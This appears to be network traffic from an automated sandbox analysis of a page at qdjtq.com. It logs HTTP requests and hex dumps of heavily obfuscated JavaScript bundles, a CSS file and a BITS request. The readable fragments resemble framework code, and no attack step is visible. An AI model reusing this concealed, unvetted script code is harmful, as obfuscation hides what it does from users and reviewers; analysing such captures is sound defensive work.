            2024-09-27 00:29:29 UTC1638INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 0a 20 20 20 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 0a 20 20 20 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 73 72 63 3d 22 2e 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 37 63 31 65 64 65 66 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20
            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" /> <script type="module" crossorigin src="./assets/index-7c1edef8.js"></script>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.649716129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:30 UTC565OUTGET /modify/assets/index-7c1edef8.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:30 UTC364INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:30 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 503862
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:38 GMT
            ETag: W/"7b036-19024953a70"
            2024-09-27 00:29:30 UTC16020INData Raw: 76 61 72 20 61 33 38 5f 30 78 33 39 61 63 66 63 3d 61 33 38 5f 30 78 32 31 36 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 36 61 32 37 2c 5f 30 78 33 66 33 35 33 30 29 7b 76 61 72 20 5f 30 78 64 66 36 34 62 34 3d 61 33 38 5f 30 78 32 31 36 33 2c 5f 30 78 34 38 30 38 32 31 3d 5f 30 78 33 66 36 61 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 39 37 31 64 38 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 31 62 30 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 36 63 32 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 34 63 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 32 39
            Data Ascii: var a38_0x39acfc=a38_0x2163;(function(_0x3f6a27,_0x3f3530){var _0xdf64b4=a38_0x2163,_0x480821=_0x3f6a27();while(!![]){try{var _0x4971d8=-parseInt(_0xdf64b4(0x1b0))/0x1+parseInt(_0xdf64b4(0x6c2))/0x2+parseInt(_0xdf64b4(0x4ca))/0x3*(-parseInt(_0xdf64b4(0x29
            2024-09-27 00:29:30 UTC16384INData Raw: 30 3d 5f 30 78 33 66 35 61 30 38 3d 3e 42 65 28 5f 30 78 33 66 35 61 30 38 29 26 26 5f 30 78 33 66 35 61 30 38 21 3d 3d 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 33 39 33 29 26 26 5f 30 78 33 66 35 61 30 38 5b 30 78 30 5d 21 3d 3d 27 2d 27 26 26 27 27 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 66 35 61 30 38 2c 30 78 61 29 3d 3d 3d 5f 30 78 33 66 35 61 30 38 2c 54 72 3d 54 30 28 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 34 36 33 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 33 32 32 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 65 31 29 2b 27 64 65 42 65 66 6f 72 65 4d 6f 27 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 36 34 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 65 32 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30
            Data Ascii: 0=_0x3f5a08=>Be(_0x3f5a08)&&_0x3f5a08!==a38_0x39acfc(0x393)&&_0x3f5a08[0x0]!=='-'&&''+parseInt(_0x3f5a08,0xa)===_0x3f5a08,Tr=T0(a38_0x39acfc(0x463)+a38_0x39acfc(0x322)+a38_0x39acfc(0x5e1)+'deBeforeMo'+a38_0x39acfc(0x564)+a38_0x39acfc(0x5e2)+a38_0x39acfc(0
            2024-09-27 00:29:31 UTC16384INData Raw: 7d 2c 27 68 61 73 27 28 5f 30 78 33 61 31 37 33 36 29 7b 76 61 72 20 5f 30 78 33 32 35 66 64 61 3d 5f 30 78 64 66 37 30 39 37 3b 72 65 74 75 72 6e 20 62 72 5b 5f 30 78 33 32 35 66 64 61 28 30 78 37 35 30 29 5d 28 74 68 69 73 2c 5f 30 78 33 61 31 37 33 36 2c 21 30 78 30 29 3b 7d 2c 27 61 64 64 27 3a 67 74 28 27 61 64 64 27 29 2c 27 73 65 74 27 3a 67 74 28 5f 30 78 64 66 37 30 39 37 28 30 78 35 30 36 29 29 2c 27 64 65 6c 65 74 65 27 3a 67 74 28 27 64 65 6c 65 74 65 27 29 2c 27 63 6c 65 61 72 27 3a 67 74 28 5f 30 78 64 66 37 30 39 37 28 30 78 36 63 38 29 29 2c 27 66 6f 72 45 61 63 68 27 3a 44 72 28 21 30 78 30 2c 21 30 78 30 29 7d 3b 72 65 74 75 72 6e 5b 5f 30 78 64 66 37 30 39 37 28 30 78 36 32 32 29 2c 5f 30 78 64 66 37 30 39 37 28 30 78 35 34 37 29 2c 5f
            Data Ascii: },'has'(_0x3a1736){var _0x325fda=_0xdf7097;return br[_0x325fda(0x750)](this,_0x3a1736,!0x0);},'add':gt('add'),'set':gt(_0xdf7097(0x506)),'delete':gt('delete'),'clear':gt(_0xdf7097(0x6c8)),'forEach':Dr(!0x0,!0x0)};return[_0xdf7097(0x622),_0xdf7097(0x547),_
            2024-09-27 00:29:31 UTC16384INData Raw: 34 61 35 31 38 34 7d 3d 5f 30 78 31 66 37 32 37 65 2c 5f 30 78 32 64 34 33 62 65 3d 5f 30 78 33 32 65 35 37 36 5b 5f 30 78 33 38 39 34 66 39 28 30 78 32 61 32 29 2b 27 6e 73 27 5d 3b 69 66 28 5f 30 78 31 66 37 32 37 65 5b 5f 30 78 33 38 39 34 66 39 28 30 78 31 64 33 29 5d 7c 7c 5f 30 78 31 66 37 32 37 65 5b 5f 30 78 33 38 39 34 66 39 28 30 78 34 37 30 29 5d 29 72 65 74 75 72 6e 21 30 78 30 3b 69 66 28 5f 30 78 34 33 64 66 66 31 26 26 5f 30 78 34 61 35 31 38 34 3e 3d 30 78 30 29 7b 69 66 28 5f 30 78 34 61 35 31 38 34 26 30 78 34 30 30 29 72 65 74 75 72 6e 21 30 78 30 3b 69 66 28 5f 30 78 34 61 35 31 38 34 26 30 78 31 30 29 72 65 74 75 72 6e 20 5f 30 78 33 32 39 63 32 64 3f 52 73 28 5f 30 78 33 32 39 63 32 64 2c 5f 30 78 31 31 36 30 66 62 2c 5f 30 78 32 64
            Data Ascii: 4a5184}=_0x1f727e,_0x2d43be=_0x32e576[_0x3894f9(0x2a2)+'ns'];if(_0x1f727e[_0x3894f9(0x1d3)]||_0x1f727e[_0x3894f9(0x470)])return!0x0;if(_0x43dff1&&_0x4a5184>=0x0){if(_0x4a5184&0x400)return!0x0;if(_0x4a5184&0x10)return _0x329c2d?Rs(_0x329c2d,_0x1160fb,_0x2d
            2024-09-27 00:29:31 UTC16384INData Raw: 30 78 32 36 62 65 31 35 2c 5f 30 78 34 34 32 31 65 35 29 7c 7c 64 65 28 5f 30 78 33 62 34 39 32 31 2c 5f 30 78 34 34 32 31 65 35 29 7c 7c 64 65 28 75 72 2c 5f 30 78 34 34 32 31 65 35 29 7c 7c 64 65 28 5f 30 78 35 31 64 36 62 62 5b 27 63 6f 6e 66 69 67 27 5d 5b 5f 30 78 34 37 36 62 33 64 28 30 78 32 63 39 29 2b 27 65 72 74 69 65 73 27 5d 2c 5f 30 78 34 34 32 31 65 35 29 3b 7d 2c 27 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 27 28 5f 30 78 62 39 65 61 39 39 2c 5f 30 78 32 64 37 61 62 35 2c 5f 30 78 61 36 30 37 64 29 7b 76 61 72 20 5f 30 78 37 66 31 65 33 34 3d 61 33 38 5f 30 78 33 39 61 63 66 63 3b 72 65 74 75 72 6e 20 5f 30 78 61 36 30 37 64 5b 27 67 65 74 27 5d 21 3d 6e 75 6c 6c 3f 5f 30 78 62 39 65 61 39 39 5b 27 5f 27 5d 5b 5f 30 78 37 66 31 65 33 34 28
            Data Ascii: 0x26be15,_0x4421e5)||de(_0x3b4921,_0x4421e5)||de(ur,_0x4421e5)||de(_0x51d6bb['config'][_0x476b3d(0x2c9)+'erties'],_0x4421e5);},'defineProperty'(_0xb9ea99,_0x2d7ab5,_0xa607d){var _0x7f1e34=a38_0x39acfc;return _0xa607d['get']!=null?_0xb9ea99['_'][_0x7f1e34(
            2024-09-27 00:29:31 UTC16384INData Raw: 2c 5f 30 78 34 36 33 39 61 31 29 29 2c 5f 30 78 32 39 62 33 62 39 21 3d 6e 75 6c 6c 26 26 21 79 65 28 5f 30 78 32 39 62 33 62 39 29 26 26 28 5f 30 78 32 39 62 33 62 39 3d 6e 75 6c 6c 29 3b 63 6f 6e 73 74 20 5f 30 78 34 36 36 62 39 62 3d 6a 61 28 29 2c 5f 30 78 33 65 38 30 66 65 3d 6e 65 77 20 53 65 74 28 29 3b 6c 65 74 20 5f 30 78 64 31 65 39 39 3d 21 30 78 31 3b 63 6f 6e 73 74 20 5f 30 78 33 37 33 33 30 30 3d 5f 30 78 34 36 36 62 39 62 5b 27 61 70 70 27 5d 3d 7b 27 5f 75 69 64 27 3a 62 6c 2b 2b 2c 27 5f 63 6f 6d 70 6f 6e 65 6e 74 27 3a 5f 30 78 34 36 33 39 61 31 2c 27 5f 70 72 6f 70 73 27 3a 5f 30 78 32 39 62 33 62 39 2c 27 5f 63 6f 6e 74 61 69 6e 65 72 27 3a 6e 75 6c 6c 2c 27 5f 63 6f 6e 74 65 78 74 27 3a 5f 30 78 34 36 36 62 39 62 2c 27 5f 69 6e 73 74
            Data Ascii: ,_0x4639a1)),_0x29b3b9!=null&&!ye(_0x29b3b9)&&(_0x29b3b9=null);const _0x466b9b=ja(),_0x3e80fe=new Set();let _0xd1e99=!0x1;const _0x373300=_0x466b9b['app']={'_uid':bl++,'_component':_0x4639a1,'_props':_0x29b3b9,'_container':null,'_context':_0x466b9b,'_inst
            2024-09-27 00:29:31 UTC16384INData Raw: 27 73 75 62 54 72 65 65 27 5d 3d 5f 30 78 34 36 34 32 35 65 2c 5f 30 78 32 65 64 39 38 66 28 5f 30 78 32 38 33 38 31 65 2c 5f 30 78 34 36 34 32 35 65 2c 5f 30 78 34 31 62 66 63 32 28 5f 30 78 32 38 33 38 31 65 5b 27 65 6c 27 5d 29 2c 5f 30 78 34 61 37 63 66 37 28 5f 30 78 32 38 33 38 31 65 29 2c 5f 30 78 35 36 35 61 30 39 2c 5f 30 78 61 38 31 34 61 32 2c 5f 30 78 33 35 35 39 31 30 29 2c 5f 30 78 32 31 65 32 64 32 5b 27 65 6c 27 5d 3d 5f 30 78 34 36 34 32 35 65 5b 27 65 6c 27 5d 2c 5f 30 78 33 35 39 37 38 61 3d 3d 3d 6e 75 6c 6c 26 26 47 75 28 5f 30 78 35 36 35 61 30 39 2c 5f 30 78 34 36 34 32 35 65 5b 27 65 6c 27 5d 29 2c 5f 30 78 34 61 66 64 30 34 26 26 4e 65 28 5f 30 78 34 61 66 64 30 34 2c 5f 30 78 61 38 31 34 61 32 29 2c 28 5f 30 78 32 30 65 65 36 64
            Data Ascii: 'subTree']=_0x46425e,_0x2ed98f(_0x28381e,_0x46425e,_0x41bfc2(_0x28381e['el']),_0x4a7cf7(_0x28381e),_0x565a09,_0xa814a2,_0x355910),_0x21e2d2['el']=_0x46425e['el'],_0x35978a===null&&Gu(_0x565a09,_0x46425e['el']),_0x4afd04&&Ne(_0x4afd04,_0xa814a2),(_0x20ee6d
            2024-09-27 00:29:31 UTC16384INData Raw: 6d 69 63 43 68 69 27 2b 5f 30 78 35 33 63 35 37 38 28 30 78 33 62 36 29 5d 2c 5f 30 78 32 61 39 62 33 35 2c 5f 30 78 65 66 35 61 64 2c 5f 30 78 31 37 35 31 30 35 2c 5f 30 78 32 32 32 35 62 64 2c 5f 30 78 31 31 34 39 39 37 2c 5f 30 78 32 37 63 32 66 35 29 2c 51 30 28 5f 30 78 35 33 34 63 37 61 2c 5f 30 78 31 36 65 38 64 62 2c 21 30 78 30 29 29 3a 5f 30 78 66 61 31 61 38 63 7c 7c 5f 30 78 32 31 30 35 31 33 28 5f 30 78 35 33 34 63 37 61 2c 5f 30 78 31 36 65 38 64 62 2c 5f 30 78 65 66 35 61 64 2c 5f 30 78 62 33 37 61 35 65 2c 5f 30 78 31 37 35 31 30 35 2c 5f 30 78 32 32 32 35 62 64 2c 5f 30 78 31 31 34 39 39 37 2c 5f 30 78 32 37 63 32 66 35 2c 21 30 78 31 29 2c 5f 30 78 35 37 61 36 39 32 29 5f 30 78 33 38 62 32 65 63 7c 7c 52 72 28 5f 30 78 31 36 65 38 64 62
            Data Ascii: micChi'+_0x53c578(0x3b6)],_0x2a9b35,_0xef5ad,_0x175105,_0x2225bd,_0x114997,_0x27c2f5),Q0(_0x534c7a,_0x16e8db,!0x0)):_0xfa1a8c||_0x210513(_0x534c7a,_0x16e8db,_0xef5ad,_0xb37a5e,_0x175105,_0x2225bd,_0x114997,_0x27c2f5,!0x1),_0x57a692)_0x38b2ec||Rr(_0x16e8db
            2024-09-27 00:29:31 UTC16384INData Raw: 63 66 63 28 30 78 34 33 63 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 34 38 62 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 36 63 29 2c 4f 74 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 3c 27 75 27 3f 64 6f 63 75 6d 65 6e 74 3a 6e 75 6c 6c 2c 55 73 3d 4f 74 26 26 4f 74 5b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 63 61 29 2b 27 65 6e 74 27 5d 28 27 74 65 6d 70 6c 61 74 65 27 29 2c 4a 6c 3d 7b 27 69 6e 73 65 72 74 27 3a 28 5f 30 78 31 39 37 62 30 39 2c 5f 30 78 31 30 37 62 30 66 2c 5f 30 78 35 62 32 36 31 30 29 3d 3e 7b 76 61 72 20 5f 30 78 34 66 31 33 65 61 3d 61 33 38 5f 30 78 33 39 61 63 66 63 3b 5f 30 78 31 30 37 62 30 66 5b 5f 30 78 34 66 31 33 65 61 28 30 78 34 37 36 29 2b 27 72 65 27 5d 28 5f 30 78 31 39 37 62 30 39 2c 5f
            Data Ascii: cfc(0x43c)+a38_0x39acfc(0x48b)+a38_0x39acfc(0x56c),Ot=typeof document<'u'?document:null,Us=Ot&&Ot[a38_0x39acfc(0x5ca)+'ent']('template'),Jl={'insert':(_0x197b09,_0x107b0f,_0x5b2610)=>{var _0x4f13ea=a38_0x39acfc;_0x107b0f[_0x4f13ea(0x476)+'re'](_0x197b09,_
            2024-09-27 00:29:31 UTC16384INData Raw: 36 34 37 66 2c 5f 30 78 35 34 33 37 36 37 29 3a 5f 30 78 35 63 63 35 36 65 5b 5f 30 78 33 32 33 30 39 37 5d 3d 5f 30 78 35 34 33 37 36 37 3b 7d 72 65 74 75 72 6e 20 5f 30 78 35 63 63 35 36 65 3b 7d 63 6f 6e 73 74 20 41 63 3d 53 79 6d 62 6f 6c 28 29 3b 66 75 6e 63 74 69 6f 6e 20 42 63 28 5f 30 78 35 61 63 33 64 37 29 7b 76 61 72 20 5f 30 78 63 36 36 32 66 63 3d 61 33 38 5f 30 78 33 39 61 63 66 63 3b 72 65 74 75 72 6e 21 79 30 28 5f 30 78 35 61 63 33 64 37 29 7c 7c 21 5f 30 78 35 61 63 33 64 37 5b 27 68 61 73 4f 77 6e 50 72 6f 70 27 2b 5f 30 78 63 36 36 32 66 63 28 30 78 36 33 39 29 5d 28 41 63 29 3b 7d 63 6f 6e 73 74 20 7b 61 73 73 69 67 6e 3a 5f 74 7d 3d 4f 62 6a 65 63 74 3b 66 75 6e 63 74 69 6f 6e 20 46 63 28 5f 30 78 66 39 32 36 31 35 29 7b 76 61 72 20
            Data Ascii: 647f,_0x543767):_0x5cc56e[_0x323097]=_0x543767;}return _0x5cc56e;}const Ac=Symbol();function Bc(_0x5ac3d7){var _0xc662fc=a38_0x39acfc;return!y0(_0x5ac3d7)||!_0x5ac3d7['hasOwnProp'+_0xc662fc(0x639)](Ac);}const {assign:_t}=Object;function Fc(_0xf92615){var


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.649720129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:31 UTC555OUTGET /modify/assets/f6170fbbtE5dP.css HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: text/css,*/*;q=0.1
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: style
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:31 UTC322INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:31 GMT
            Content-Type: text/css; charset=utf-8
            Content-Length: 952
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:28 GMT
            ETag: W/"3b8-19024951360"
            2024-09-27 00:29:31 UTC952INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 6c 6f 61 64 69 6e 67 2d 62 67 41 6e 69 6d 7b 30 25 2c 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 36 33 35 29 7d 35 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 7d 7d 2e 67 2d 6c 6f 61 64 69 6e 67 2d 6d 61 73 6b 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 3a 67 2d 6c 6f 61
            Data Ascii: @keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loa


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.649723184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-09-27 00:29:33 UTC466INHTTP/1.1 200 OK
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF67)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-weu-z1
            Cache-Control: public, max-age=58601
            Date: Fri, 27 Sep 2024 00:29:33 GMT
            Connection: close
            X-CID: 2


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.649725129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:33 UTC528OUTGET /modify/assets/7f8692c3ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:34 UTC361INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:34 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 4610
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"1202-19024951b30"
            2024-09-27 00:29:34 UTC4610INData Raw: 63 6f 6e 73 74 20 61 32 30 5f 30 78 32 33 38 38 31 34 3d 61 32 30 5f 30 78 39 37 34 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 62 31 37 37 2c 5f 30 78 35 36 62 35 64 65 29 7b 63 6f 6e 73 74 20 5f 30 78 36 33 65 66 37 36 3d 61 32 30 5f 30 78 39 37 34 33 2c 5f 30 78 33 61 36 64 66 37 3d 5f 30 78 31 32 62 31 37 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 33 32 37 39 61 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 65 66 37 36 28 30 78 31 37 30 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 65 66 37 36 28 30 78 31 37 61 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 65 66 37 36 28 30 78 31 38 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36
            Data Ascii: const a20_0x238814=a20_0x9743;(function(_0x12b177,_0x56b5de){const _0x63ef76=a20_0x9743,_0x3a6df7=_0x12b177();while(!![]){try{const _0x3279a0=-parseInt(_0x63ef76(0x170))/0x1*(-parseInt(_0x63ef76(0x17a))/0x2)+-parseInt(_0x63ef76(0x18a))/0x3*(-parseInt(_0x6


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.649724129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:33 UTC528OUTGET /modify/assets/7ae8a4f5ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:34 UTC362INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:34 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 53555
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"d133-19024951b30"
            2024-09-27 00:29:34 UTC16022INData Raw: 63 6f 6e 73 74 20 61 31 39 5f 30 78 35 62 37 34 35 34 3d 61 31 39 5f 30 78 34 66 61 30 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 64 66 65 37 2c 5f 30 78 35 32 65 66 66 36 29 7b 63 6f 6e 73 74 20 5f 30 78 31 35 66 66 34 37 3d 61 31 39 5f 30 78 34 66 61 30 2c 5f 30 78 35 35 63 30 66 34 3d 5f 30 78 32 33 64 66 65 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 36 39 62 39 63 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66 34 37 28 30 78 32 33 62 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66 34 37 28 30 78 32 34 65 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66 34 37 28 30 78 32 32 30 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66
            Data Ascii: const a19_0x5b7454=a19_0x4fa0;(function(_0x23dfe7,_0x52eff6){const _0x15ff47=a19_0x4fa0,_0x55c0f4=_0x23dfe7();while(!![]){try{const _0x269b9c=-parseInt(_0x15ff47(0x23b))/0x1+parseInt(_0x15ff47(0x24e))/0x2*(parseInt(_0x15ff47(0x220))/0x3)+-parseInt(_0x15ff
            2024-09-27 00:29:34 UTC16384INData Raw: 5f 30 78 35 36 39 39 36 31 3b 5f 30 78 31 39 36 65 37 30 26 26 28 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 30 3f 5f 30 78 66 34 64 33 63 38 5b 5f 30 78 33 62 65 36 38 32 28 30 78 32 35 64 29 5d 28 7b 27 74 79 70 65 27 3a 30 78 30 2c 27 76 61 6c 75 65 27 3a 5f 30 78 31 39 36 65 37 30 7d 29 3a 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 31 7c 7c 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 32 7c 7c 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 33 3f 28 5f 30 78 66 34 64 33 63 38 5b 5f 30 78 33 62 65 36 38 32 28 30 78 32 35 61 29 5d 3e 30 78 31 26 26 28 5f 30 78 66 66 34 34 62 36 3d 3d 3d 27 2a 27 7c 7c 5f 30 78 66 66 34 34 62 36 3d 3d 3d 27 2b 27 29 26 26 5f 30 78 35 65 31 61 32 32 28 27 41 5c 78 32 30 72 65 70 65 61 74 61 62 27 2b 27 6c 65 5c 78 32 30 70 61 72 61
            Data Ascii: _0x569961;_0x196e70&&(_0x32b391===0x0?_0xf4d3c8[_0x3be682(0x25d)]({'type':0x0,'value':_0x196e70}):_0x32b391===0x1||_0x32b391===0x2||_0x32b391===0x3?(_0xf4d3c8[_0x3be682(0x25a)]>0x1&&(_0xff44b6==='*'||_0xff44b6==='+')&&_0x5e1a22('A\x20repeatab'+'le\x20para
